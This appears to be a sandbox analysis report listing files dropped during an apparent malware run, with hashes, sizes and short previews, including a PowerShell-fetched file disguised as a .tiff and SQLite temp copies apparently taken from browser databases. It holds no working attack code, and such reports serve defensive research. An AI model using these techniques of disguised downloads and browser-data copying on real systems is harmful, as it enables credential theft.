SHA-512:	8B5750376ECAE794AE73729FD8AB36CABED4512E54E55E536F97485A590FDCAE558A5EAF522D1CD9D327445D530FEB040D6B1959F18A2E89A349AE5F0C67E011
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.8.0.4.5.9.5.5.4.6.9.8.3.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.8.0.4.5.9.7.0.6.2.6.0.6.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.e.0.4.f.a.f.2.-.2.b.8.7.-.4.6.a.a.-.9.6.5.d.-.4.0.d.d.d.7.d.1.9.f.f.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.d.0.1.6.c.5.d.-.a.7.f.f.-.4.3.9.a.-.8.9.e.6.-.5.3.7.e.a.5.f.7.1.2.7.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.e.x.p.l.o.r.e.r...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.E.X.P.L.O.R.E.R...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.e.e.8.-.0.0.0.1.-.0.0.1.4.-.d.8.b.1.-.5.3.7.6.b.5.6.1.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.9.0.b.0.8.0.e.0.6.5.5.7.2.0.c.a.d.8.c.1.c.a.e.4.b.8.1.9.3.c.9.3.8.2.c.9.a.c.9.2.!.e.x.p.l.o.r.e.r...e.x.e.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER538.tmp.dmp

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Wed Jan 8 10:09:55 2025, 0x1205a4 type
Category:	dropped
Size (bytes):	57526
Entropy (8bit):	1.5752069011943641
Encrypted:	false
SSDEEP:	192:QADybE7RGOhO2pxdsNbZDHC8Yav5bozjyImw:5yA7YubshZDHCw5szuId
MD5:	8BCE9A77960B2735044D38DE01BF4FF9
SHA1:	41431D2EC9BDABE37499070CFB9E31E0F61C98D9
SHA-256:	C0B6796121D0AC21E6AC4020B069D8D2237A4EADAA0CAF220D1D77B00920A95D
SHA-512:	1BC536F271C6B7516CE49D19750AE0EF68843D9DAA4DEF5D0E7035BD28A6024B442EAC5A3703F79949DA37ED025832CFDB7049646E02D7723623B23C40B55C0C
Malicious:	false
Preview:	MDMP..a..... ........N~g.........................................7..........T.......8...........T...........0...............L...........8...............................................................................eJ..............Lw......................T............N~g............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5E5.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8560
Entropy (8bit):	3.6926133028109454
Encrypted:	false
SSDEEP:	192:R6l7wVeJf1/Q6Y9cIFNgmfqtjbDpD089bmkGqnfhfim:R6lXJ946YG4NgmfqtjbmkG6f9
MD5:	5A49BA177B160AE675DDE2A17E0E3142
SHA1:	3970A15D6430B4C0B7F3822765F0639778739373
SHA-256:	37561A999A806585C02B8E93D2277635C199D5D16A13207E5A300082357F70B9
SHA-512:	D95DC458423EEE6FBFD9F9240CE16D33D01C458EF4CAC005EA45D98572276088480A90EE51D1AFCE5085F0B40346BB88303E2AF552D40A9EF58589E16613B625
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.9.1.2.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER683.tmp.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4719
Entropy (8bit):	4.452792573715219
Encrypted:	false
SSDEEP:	48:cvIwWl8zsaJg771I9LoWpW8VYaYm8M4JYcF/yq85MvNb9Q3Pd:uIjfoI74B7VKJ3TNba3Pd
MD5:	82639DA9F4A438E9D7C4E9714E54F1F2
SHA1:	412254AAE6E4C02C22C931D49E73C98D70404C39
SHA-256:	B40D8E5DCED0675DA385BC61BD6B6829EC49CFD5205AC2F5A1D9B153DDE7FC9A
SHA-512:	F5CFBC4B0E86D18F014465C0BE1F2AD66DCE6339D45DAA5D7A9EBE80BDF34424482653BE0123FE76B3D8446FD1551717DA358DC405AEDBF477127ACF6F7D5783
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="666792" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\icgfugf.log

Download File

Process:	C:\Users\user\AppData\Roaming\icgfugf
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	311
Entropy (8bit):	5.347482639021185
Encrypted:	false
SSDEEP:	6:Q3La/xwchA2DLIP12MUAvvr3tDLIP12MUAvvR+uTL2ql2ABgTv:Q3La/hhpDLI4M9tDLI4MWuPTAv
MD5:	1AC8524D3800CDD5A91A864BCD4C3AB5
SHA1:	D003AEE44AC954938CE83E4A80412E04F726EA83
SHA-256:	8652A0399D65C2D111841F66EF2E930CDB8291CC8203252D59FD4921FF336C02
SHA-512:	9F28B59B99D0BC1EB60D29BE54CE2DAAC7D9B5D895311169578383C19A46CCF7CDE498EB6D7F172CF7D1D11E5B16665DF989CD8EEC527282BE3B796CD08C7DAC
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\sweetnessgoodforgreatnessthingswithgood[1].tiff

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 text, with very long lines (12085), with CRLF line terminators
Category:	dropped
Size (bytes):	224763
Entropy (8bit):	5.3949239509459925
Encrypted:	false
SSDEEP:	3072:A8gVmI3b0mgfmWu+ke9VOv5iG5sVhQ30Wk+70wgA1A:A8gVxe9VOvM
MD5:	8CCD875893CD23B67D7C61EA735F5C52
SHA1:	6171C7DD4F67A67FFF0CA151C7E9A06104E00DEF
SHA-256:	16328212055D6AA79C45B6624607F74B732B159DB4C6CDF7D8E6835EBDC6E392
SHA-512:	3CEB06944FB1CB3F176E9163F761E3C2D97E72A9E0177F417D4A83E03F4B539FBCB2D7EBE53865A483CACDC8EAF16CE292245AED1CC60C207F7CA038CED07F31
Malicious:	false
Preview:	Dim sh 'WScript.Shell object..Dim fso 'Scripting.FileSystemObject..Dim format 'StringFormatter object..Dim suiteFolder 'string: folder where test suite scripts are located..Dim projectFolder 'string: root folder for this project..Dim suiteFilter 'string: filename filter for selecting integration test suites...Dim caption 'string: MsgBox/PopUp title bar text...Dim aDocGens 'array of strings: filespecs for code-comment-based documentation generators...Dim aGits 'array of strings: common filespecs for Git bash and Git GUI executables...Dim aDocs 'array of strings: filespecs for last-minute docs to update before a push...Dim nextItem 'integer: current index of the prepItems array...Dim settings 'integer: controls MsgBox/PopUp behaviour...Dim prepItems 'array: list of prcedure (Sub) names to be called by window.SetTimeout...Dim flagFile 'string: filename of a temp file used by Setup.vbs...Dim versionLink 'web page with version info..Dim editor 'document editor..Dim powershell 'filespec of a

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	5829
Entropy (8bit):	4.901113710259376
Encrypted:	false
SSDEEP:	96:ZCJ2Woe5H2k6Lm5emmXIGLgyg12jDs+un/iQLEYFjDaeWJ6KGcmXlQ9smpFRLcUn:Uxoe5HVsm5emdQgkjDt4iWN3yBGHVQ9v
MD5:	7827E04B3ECD71FB3BD7BEEE4CA52CE8
SHA1:	22813AF893013D1CCCACC305523301BB90FF88D9
SHA-256:	5D66D4CA13B4AF3B23357EB9BC21694E7EED4485EA8D2B8C653BEF3A8E5D0601
SHA-512:	D5F6604E49B7B31C2D1DA5E59B676C0E0F37710F4867F232DF0AA9A1EE170B399472CA1DF0BD21DF702A1B5005921D35A8E6858432B00619E65D0648C74C096B
Malicious:	false
Preview:	PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	1144
Entropy (8bit):	5.290848674040258
Encrypted:	false
SSDEEP:	24:32gSKco4KmZjKbmOIKod6emZ9tYs4RPQoUEJ0gt/NKM9rgd:GgSU4xympjmZ9tz4RIoUl8NF9C
MD5:	F262C231D15773CB65C99F7B6AD6A81C
SHA1:	5DE14E5014654D233C869A4CA47BACF3E1120A1D
SHA-256:	2A76444C5964969A6D590232EB13C41FA85F6D4DC94E693593A8681ED2C46581
SHA-512:	23A1D7849A86E9E619D942165F34196D00D7967493BBA5CDE78190F7E2055072F2AB0CD8081739D513FC4197592D621B5DE70FCC6DB80DA5B1BB564430583F9F
Malicious:	false
Preview:	@...e...........................................................@...............(..o...B.Rb&............Microsoft.VisualBasic...H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...

C:\Users\user\AppData\Local\Temp\EEC2.tmp

Download File

Process:	C:\Windows\SysWOW64\explorer.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\EEC2.tmp-shm

Download File

Process:	C:\Windows\SysWOW64\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\F4DE.tmp

Download File

Process:	C:\Windows\SysWOW64\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\F5AB.tmp

Download File

Process:	C:\Windows\SysWOW64\explorer.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\F6A6.tmp

Download File

Process:	C:\Windows\SysWOW64\explorer.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\F714.tmp

Download File

Process:	C:\Windows\SysWOW64\explorer.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\F7C1.tmp

Download File

Process:	C:\Windows\SysWOW64\explorer.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\F820.tmp

Download File

Process:	C:\Windows\SysWOW64\explorer.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\RES2316.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Wed Jan 8 12:05:21 2025, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1328
Entropy (8bit):	3.984349037776297
Encrypted:	false
SSDEEP:	24:HQe9E2+fpigjXDfH9fwKEbsmfII+ycuZhNarakSFEPNnqSqd:OpigjzSKPmg1ulma3yqSK
MD5:	9EB53ECDEF6DCAB92413B86113FD2733
SHA1:	D970310046A84CCD8E0CF211D51F62DC9FF5405D
SHA-256:	E51AC1749C79022A347930FAAE3E9BBBB84E267FAF48DF3FAFE87A32B99FD4D5
SHA-512:	D4876EFA65B686ECBC93EC247642C4B181599CCDD17B37D94F52C8D8F5239A8639D154D330109B372BD1CAE18DF231AC7D626D341B9E95793ECE0FCF6F89F639
Malicious:	false
Preview:	L....j~g.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........T....c:\Users\user\AppData\Local\Temp\thj2bm0i\CSCE4BAB64F6B1C4E5BA339BD9879E79427.TMP.................kp...O.Y..C...........4.......C:\Users\user\AppData\Local\Temp\RES2316.tmp.-.<....................a..Microsoft (R) CVTRES.\.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...t.h.j.2.b.m.0.i...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_irjxkjqv.cut.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lwwyjrgp.cqj.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rduhv53q.imh.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wfitztog.1vz.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xc00ohua.i4j.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yz0dp05h.koi.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
